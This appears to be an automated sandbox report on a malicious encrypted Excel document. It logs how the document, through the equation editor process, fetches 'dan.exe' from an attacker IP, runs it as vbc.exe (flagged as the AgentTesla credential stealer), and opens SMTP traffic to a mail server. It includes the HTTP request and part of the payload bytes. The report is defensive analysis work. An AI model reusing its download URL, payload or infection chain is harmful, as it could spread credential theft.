                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                      File Type:data
                                                                                      Stream Size:112
                                                                                      Entropy:2.7597816111
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                      File Type:data
                                                                                      Stream Size:200
                                                                                      Entropy:3.13335930328
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                      File Type:data
                                                                                      Stream Size:76
                                                                                      Entropy:2.79079600998
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1247752
                                                                                      General
                                                                                      Stream Path:EncryptedPackage
                                                                                      File Type:data
                                                                                      Stream Size:1247752
                                                                                      Entropy:7.99983327297
                                                                                      Base64 Encoded:True
                                                                                      Data ASCII:. . . . . . . . . } 2 . . . . u 0 . . . Y . - o G . . w . . L . . . P m . * . ? L . . . I . . . . . . w . N . . . , j . . @ M . U ^ . . 3 a K . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h S . . d . . . . . . M . h / . h
                                                                                      Data Raw:00 0a 13 00 00 00 00 00 e8 7d 32 92 c3 f0 95 75 30 f1 df f0 59 bd 2d 6f 47 c0 96 77 1d 2e 4c 8a 92 91 50 6d b7 2a ab 3f 4c 01 0c 80 49 d2 a9 ec 0d ca ab 77 09 4e 1b d2 ca 2c 6a c4 a2 40 4d e5 55 5e b6 9b 33 61 4b de bb e6 4d 07 68 2f bb 68 53 bc c2 64 16 f5 86 0c bb e6 4d 07 68 2f bb 68 53 bc c2 64 16 f5 86 0c bb e6 4d 07 68 2f bb 68 53 bc c2 64 16 f5 86 0c bb e6 4d 07 68 2f bb 68
                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                      General
                                                                                      Stream Path:EncryptionInfo
                                                                                      File Type:data
                                                                                      Stream Size:224
                                                                                      Entropy:4.51306116313
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . ` . / . . . . . . . @ . . A 2 . . . . . . . . . . . . E c . 9 . . . . N U . . . . . 4 . , [ . < J . f . ; . ^ U . \\ . . . . . . d >
                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 16, 2021 12:14:31.145813942 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.282154083 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.282366991 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.282865047 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.421068907 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.421101093 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.421123028 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.421145916 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.421287060 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.421329975 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.557471037 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557502985 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557517052 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557538986 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557574034 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557662964 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557684898 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557708025 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.557713032 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.557759047 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.557765961 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.557770014 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694021940 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694065094 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694098949 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694101095 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694123030 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694132090 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694144964 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694166899 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694169044 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694200039 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694201946 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694231987 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694237947 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694263935 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694264889 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694293976 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694294930 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694327116 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694330931 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694361925 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694363117 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694392920 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694395065 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694423914 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694425106 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694454908 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694456100 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694485903 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694487095 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694516897 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.694518089 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.694547892 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.695394993 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.830849886 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830887079 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830900908 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830919027 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830938101 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830955982 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830972910 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.830991983 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831180096 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831248045 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831302881 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831309080 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831326962 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831347942 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831366062 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831367016 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831384897 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831394911 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831403017 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831420898 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831427097 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831439972 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831450939 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831456900 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831475973 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831480980 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831496000 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831501007 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831518888 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831521034 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831537008 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831540108 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831556082 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831561089 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831573009 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831577063 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831592083 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831597090 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831609011 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831612110 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831629992 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831631899 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831649065 CEST4916580192.168.2.22192.227.228.121
                                                                                      Jun 16, 2021 12:14:31.831651926 CEST8049165192.227.228.121192.168.2.22
                                                                                      Jun 16, 2021 12:14:31.831670046 CEST8049165192.227.228.121192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 16, 2021 12:16:02.714337111 CEST5219753192.168.2.228.8.8.8
                                                                                      Jun 16, 2021 12:16:02.780240059 CEST53521978.8.8.8192.168.2.22
                                                                                      Jun 16, 2021 12:16:05.059793949 CEST5309953192.168.2.228.8.8.8
                                                                                      Jun 16, 2021 12:16:05.110799074 CEST53530998.8.8.8192.168.2.22
                                                                                      Jun 16, 2021 12:16:05.111702919 CEST5309953192.168.2.228.8.8.8
                                                                                      Jun 16, 2021 12:16:05.162806988 CEST53530998.8.8.8192.168.2.22
                                                                                      Jun 16, 2021 12:16:05.197738886 CEST5283853192.168.2.228.8.8.8
                                                                                      Jun 16, 2021 12:16:05.269443035 CEST53528388.8.8.8192.168.2.22
                                                                                      Jun 16, 2021 12:16:05.270204067 CEST5283853192.168.2.228.8.8.8
                                                                                      Jun 16, 2021 12:16:05.330282927 CEST53528388.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jun 16, 2021 12:16:02.714337111 CEST192.168.2.228.8.8.80x70c0Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jun 16, 2021 12:16:02.780240059 CEST8.8.8.8192.168.2.220x70c0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                      Jun 16, 2021 12:16:02.780240059 CEST8.8.8.8192.168.2.220x70c0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                      Jun 16, 2021 12:16:02.780240059 CEST8.8.8.8192.168.2.220x70c0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                      Jun 16, 2021 12:16:02.780240059 CEST8.8.8.8192.168.2.220x70c0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • 192.227.228.121

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249165192.227.228.12180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 16, 2021 12:14:31.282865047 CEST0OUTGET /dan.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: 192.227.228.121
                                                                                      Connection: Keep-Alive
                                                                                      Jun 16, 2021 12:14:31.421068907 CEST1INHTTP/1.1 200 OK
                                                                                      Date: Wed, 16 Jun 2021 10:14:31 GMT
                                                                                      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                                      Last-Modified: Wed, 16 Jun 2021 02:35:20 GMT
                                                                                      ETag: "d2200-5c4d8f11f527c"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 860672
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 63 c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 da 0c 00 00 46 00 00 00 00 00 00 4e f9 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f9 0c 00 4b 00 00 00 00 00 0d 00 0c 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 b3 f8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 d9 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 0c 42 00 00 00 00 0d 00 00 44 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 f9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 00 27 01 00 48 05 01 00 03 00 00 00 01 00 00 06 48 2c 02 00 6b cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 12 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 c5 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 00 00 00 00 38 45 00 00 00 02 16 28 08 00 00 06 20 05 00 00 00 28 06 00 00 06 3a 2f 00 00 00 38 2a 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 19 00 00 00 02 16 28 11 00 00 0a 38 32 00 00 00 20 00 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 10 00 00 00 96 ff ff ff b1 ff ff ff 00 00 00 00 31 00 00 00 c2 ff ff ff 96 ff ff ff 48 00 00 00 38 2c 00 00 00 26 20 04 00 00 00 38 cb ff ff ff 02 16 28 07 00 00 06 28 06 00 00 06 28 05 00 00 06 39 df ff ff ff 26 20 06 00 00 00 38 aa ff ff ff 02 16 28 09 00 00 06 20 02 00 00 00 28 05 00 00 06 3a 94 ff ff ff 26 2a 00 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 12 00 00 0a 2a 00 00 56 2b 02 26 16 02 28 14 00 00 06 28 0d 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 13 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 15 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 16 00 00 0a 2a 00 2e 2b 02 26 16 00 28 14 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 6f 20 00 00 06 2a 00 3a 2b 02 26
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`c`FN @ @KB` H.textT `.rsrcBD@@.reloc` @B0H'HH,kj+&(((o*0+&+& 8E( (:/8*( 8(82 E1H8,& 8(((9& 8( (:&*V+&(((*V+&(((*+&*+&*J+&(*J+&(*J+&(*J+&(*.+&(*:+&o *:+&


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Jun 16, 2021 12:16:03.518151999 CEST58749166208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Jun 16, 2021 12:16:03.518692970 CEST49166587192.168.2.22208.91.198.143EHLO 376483
                                                                                      Jun 16, 2021 12:16:03.694005013 CEST58749166208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jun 16, 2021 12:16:03.694273949 CEST49166587192.168.2.22208.91.198.143STARTTLS
                                                                                      Jun 16, 2021 12:16:03.869683027 CEST58749166208.91.198.143192.168.2.22220 2.0.0 Ready to start TLS

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:12:13:39
                                                                                      Start date:16/06/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase:0x13fb70000
                                                                                      File size:27641504 bytes
                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:12:14:00
                                                                                      Start date:16/06/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:12:14:03
                                                                                      Start date:16/06/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x900000
                                                                                      File size:860672 bytes
                                                                                      MD5 hash:E123306FCC7FD3C3BDA8993B4F6C43A2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:12:14:05
                                                                                      Start date:16/06/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                      Imagebase:0x900000
                                                                                      File size:860672 bytes
                                                                                      MD5 hash:E123306FCC7FD3C3BDA8993B4F6C43A2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2351385354.0000000002318000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >